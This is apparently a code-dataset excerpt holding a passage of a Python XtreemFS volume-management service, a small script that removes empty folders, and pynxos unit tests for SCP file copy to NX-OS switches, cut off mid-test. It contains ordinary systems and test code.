stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # mkdir -p <mountpoint>
# subprocess.check_output(['mkdir', '-p', mountPoint])
# # mount.xtreemfs <dir_ip>:32638/<volumename> <mountpoint>
# subprocess.check_output(['mount.xtreemfs',
# '%s:32638/%s' % (self.dirNodes[0].ip, volumeName),
# mountPoint],
# stdout=subprocess.STDOUT)
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not mount volume: ' + e.output)
# xtfsutil <mountpoint> args
process = subprocess.Popen(['xtfsutil', mountPoint] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout_xtfsutil, stderr_xtfsutil) = (stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# umount <mountpoint>
process = subprocess.Popen(['umount', mountPoint],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# rmdir <mountpoint>
process = subprocess.Popen(['rmdir', mountPoint])
(stdout, stderr) = process.communicate()
process.poll()
if process.returncode != 0:
self.logger.info('Failed to set %s policy: %s; %s', policyName, stdout, stderr)
return HttpErrorResponse("Failed to set %s policy: %s; %s" % (policyName, stdout, stderr))
# # with python 2.7
# try:
# # umount <mountpoint>
# subprocess.check_output(['umount', mountPoint])
# # fusermount -u <mountpoint>
# #subprocess.check_output(['fusermount', '-u', mountPoint])
# # rmdir <mountpoint>
# subprocess.check_output(['rmdir', mountPoint])
# except subprocess.CalledProcessError as e:
# return HttpErrorResponse('ERROR: could not unmount volume: ' + e.output)
self.logger.info('Setting %s policy: %s; %s', policyName, stdout_xtfsutil, stderr_xtfsutil)
return HttpJsonResponse({ 'stdout': stdout_xtfsutil })
@expose('POST')
def set_osd_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set OSD selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-osp <policy>
args = [ '--set-osp', policy ]
return self.set_policy(volumeName, 'OSD selection', args)
@expose('POST')
def set_replica_sel_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replica selection policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
# xtfsutil <path> --set-rsp <policy>
args = [ '--set-rsp', policy ]
return self.set_policy(volumeName, 'Replica selection', args)
@expose('POST')
def set_replication_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Replication policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'factor' in kwargs:
return HttpErrorResponse('ERROR: Required argument (factor) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
factor = kwargs.pop('factor')
# xtfsutil <path> --set-drp --replication-policy <policy> --replication-factor <factor>
args = [ '--set-drp',
'--replication-policy', policy,
'--replication-factor', factor ]
return self.set_policy(volumeName, 'Replication', args)
@expose('POST')
def set_striping_policy(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse('ERROR: Wrong state to set Striping policy.')
if not 'volumeName' in kwargs:
return HttpErrorResponse('ERROR: Required argument (volumeName) doesn\'t exist')
if not 'policy' in kwargs:
return HttpErrorResponse('ERROR: Required argument (policy) doesn\'t exist')
if not 'width' in kwargs:
return HttpErrorResponse('ERROR: Required argument (factor) doesn\'t exist')
if not 'stripe-size' in kwargs:
return HttpErrorResponse('ERROR: Required argument (stripe-size) doesn\'t exist')
volumeName = kwargs.pop('volumeName')
policy = kwargs.pop('policy')
width = kwargs.pop('width')
stripe_size = kwargs.pop('stripe-size')
# xtfsutil <path> --set-dsp --striping-policy <policy> --striping-policy-width <width> --striping-policy-stripe-size <stripe-size>
args = [ '--set-dsp',
'--striping-policy', policy,
'--striping-policy-width', width,
'--striping-policy-stripe-size', stripe_size ]
return self.set_policy(volumeName, 'Striping', args)
@expose('POST')
def toggle_persistent(self, kwargs):
self.persistent = not self.persistent
self.logger.debug('toggle_persistent: %s' % self.persistent)
return self.get_service_info({})
@expose('POST')
def set_osd_size(self, kwargs):
if not 'size' in kwargs:
return HttpErrorResponse("ERROR: Required argument (size) doesn't exist")
try:
self.osd_volume_size = int(kwargs['size'])
self.logger.debug('set_osd_size: %s' % self.osd_volume_size)
return self.get_service_info({})
except ValueError:
return HttpErrorResponse("ERROR: Required argument (size) should be an integer")
@expose('POST')
def get_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to get service snapshot.')
self.state = self.S_EPILOGUE
# stop all agent services
self.logger.debug("Stopping all agent services")
self._stop_all(remove=False)
self.logger.debug("Calling get_snapshot on agents")
# dictionary mapping node IDs to tuples of uuids/None (DIR, MRC, OSD)
nodes_snapshot = {}
for node in self.nodes:
if node.id not in nodes_snapshot:
nodes_snapshot[node.id] = {
'data': None,
'dir_uuid': self.dir_node_uuid_map.get(node.id),
'mrc_uuid': self.mrc_node_uuid_map.get(node.id),
'osd_uuid': self.osd_node_uuid_map.get(node.id)
}
try:
# get snapshot from this agent node, independent of what
# XtreemFS services are running there
data = client.get_snapshot(node.ip, 5555)
self.logger.debug('get_snapshot(%s) HTTP code: %s' % (node.ip,
data[0]))
nodes_snapshot[node.id]['data'] = base64.b64encode(data[1])
except client.AgentException:
self.logger.exception('Failed to get snapshot from node %s' %
node)
self.state = self.S_ERROR
raise
# Get ID of attached volume
volume_id = self.osd_uuid_volume_map.get(
nodes_snapshot[node.id]['osd_uuid'])
nodes_snapshot[node.id]['volume'] = volume_id
if volume_id:
volume = self.get_volume(volume_id)
nodes_snapshot[node.id]['cloud'] = volume.cloud.cloud_name
for key in 'dir_uuid', 'mrc_uuid', 'osd_uuid', 'volume':
self.logger.debug("nodes_snapshot[%s]['%s']: %s" % (node.id,
key, nodes_snapshot[node.id][key]))
self.logger.debug("Shutting all agents down")
self._do_shutdown(stop_services=False)
return HttpJsonResponse(nodes_snapshot.values())
@expose('POST')
def set_service_snapshot(self, kwargs):
if self.state != self.S_RUNNING:
return HttpErrorResponse(
'ERROR: Wrong state to set service snapshot.')
if not 'nodes' in kwargs:
return HttpErrorResponse(
"ERROR: Required argument (nodes) doesn't exist")
nodes = kwargs['nodes']
if len(nodes) != len(self.nodes):
err = "set_service_snapshot: len(nodes) != len(self.nodes)"
self.logger.error(err)
return HttpErrorResponse(err)
self.logger.info("set_service_snapshot: stopping all agent services")
# rewriting state
self.osdNodes = []
self.mrcNodes = []
self.dirNodes = []
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
for node, data in zip(self.nodes, nodes):
volumeid = data.get('volume')
osd_uuid = data.get('osd_uuid')
mrc_uuid = data.get('mrc_uuid')
dir_uuid = data.get('dir_uuid')
# If this is a dir node
if dir_uuid:
self.dir_node_uuid_map[node.id] = dir_uuid
self.dirNodes.append(node)
# If this is a mrc node
if mrc_uuid:
self.mrc_node_uuid_map[node.id] = mrc_uuid
self.mrcNodes.append(node)
# If this is an OSD node
if osd_uuid:
self.osd_node_uuid_map[node.id] = osd_uuid
self.osdNodes.append(node)
if volumeid:
self.osd_uuid_volume_map[osd_uuid] = volumeid
try:
self.get_volume(volumeid)
except Exception:
# This volume is not in the list of known ones.
volumeCloud = self._init_cloud(data.get('cloud'))
class volume:
id = volumeid
cloud = volumeCloud
self.volumes.append(volume)
# Regardless of node type, restore metadata
try:
self.logger.info('set_service_snapshot: restoring %s' %
node.ip)
data = client.set_snapshot(node.ip, 5555, data['archive'])
except client.AgentException, err:
self.logger.exception(err)
raise err
self.logger.info("set_service_snapshot: starting all agent services")
self._start_all()
self.logger.info("set_service_snapshot: all agent services started")
return HttpJsonResponse()
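For reference, the xtfsutil argument list that set_striping_policy() above assembles before handing it to set_policy() would look like this for a RAID0 layout (the concrete width and stripe size are illustrative):
# illustrative values only
args = ['--set-dsp',
        '--striping-policy', 'RAID0',
        '--striping-policy-width', '2',
        '--striping-policy-stripe-size', '128']
# set_policy() then mounts the volume under /tmp/<volumeName>, runs
# ['xtfsutil', mountPoint] + args, and unmounts again.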
| 32,779
| 4,876
| 46
|
a3c424cf728d4c2ef3a50ff9cfcd26a82c1360fa
| 505
|
py
|
Python
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 50
|
2020-09-19T16:40:21.000Z
|
2022-02-05T05:48:42.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 266
|
2020-09-25T17:24:04.000Z
|
2021-11-29T07:17:57.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 113
|
2020-09-26T10:28:11.000Z
|
2021-10-15T06:58:53.000Z
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk(x))  # walk the user-supplied path, not a hardcoded one
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
| 26.578947
| 85
| 0.720792
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk(x))  # walk the user-supplied path, not a hardcoded one
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
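A variant sketch: walking bottom-up and re-checking each directory removes nested empty folders in a single pass, whereas the loop above only removes directories that are already empty leaves.
for path, folders, files in os.walk(x, topdown=False):
    if not os.listdir(path):  # re-check, since child folders may have just been removed
        os.rmdir(path)
        print(f'Removed empty directory: {path}')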
| 0
| 0
| 0
|
0a5858e6445232a1bc20db7f822c0cac94845b29
| 21,764
|
py
|
Python
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 14
|
2016-04-17T19:03:15.000Z
|
2021-04-06T13:04:23.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 8
|
2016-02-02T23:44:12.000Z
|
2019-02-15T20:20:20.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 17
|
2016-04-17T19:03:17.000Z
|
2021-04-05T09:55:43.000Z
|
import unittest
import mock
from tempfile import NamedTemporaryFile
from pynxos.features.file_copy import FileCopy, FileTransferError
if __name__ == "__main__":
unittest.main()
| 91.445378
| 3,856
| 0.66826
|
import unittest
import mock
from tempfile import NamedTemporaryFile
from pynxos.features.file_copy import FileCopy, FileTransferError
class FileCopyTestCase(unittest.TestCase):
@mock.patch('pynxos.device.Device', autospec=True)
def setUp(self, mock_device):
self.device = mock_device
self.device.host = 'host'
self.device.username = 'user'
self.device.password = 'pass'
self.fc = FileCopy(self.device, '/path/to/source_file')
def test_init(self):
self.assertEqual(self.fc.device, self.device)
self.assertEqual(self.fc.src, '/path/to/source_file')
self.assertEqual(self.fc.dst, 'source_file')
self.assertEqual(self.fc.port, 22)
self.assertEqual(self.fc.file_system, 'bootflash:')
def test_get_remote_size(self):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
result = self.fc.get_remote_size()
expected = 19439792128
self.assertEqual(result, expected)
self.device.show.assert_called_with('dir bootflash:', raw_text=True)
@mock.patch('os.path.getsize')
def test_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 10
result = self.fc.enough_remote_space()
self.assertEqual(result, True)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.getsize')
def test_not_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 100000000000000000
result = self.fc.enough_remote_space()
self.assertEqual(result, False)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_exists(self, mock_isfile):
mock_isfile.return_value = True
result = self.fc.local_file_exists()
expected = True
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_doesnt_exist(self, mock_isfile):
mock_isfile.return_value = False
result = self.fc.local_file_exists()
expected = False
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'b211e79fbaede5859ed2192b0fc5f1d5'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, True)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_doesnt_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'abcdef12345'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, False)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
def test_remote_file_doesnt_exists(self):
self.device.show.return_value = 'No such file'
result = self.fc.remote_file_exists()
self.assertEqual(result, False)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
def test_remote_file_exists(self):
self.device.show.return_value = ' 5 Mar 23 00:48:15 2016 smallfile\nUsage for bootflash://sup-local\n 2425630720 bytes used\n19439788032 bytes free\n21865418752 bytes total\n'
result = self.fc.remote_file_exists()
self.assertEqual(result, True)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_get_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.get()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
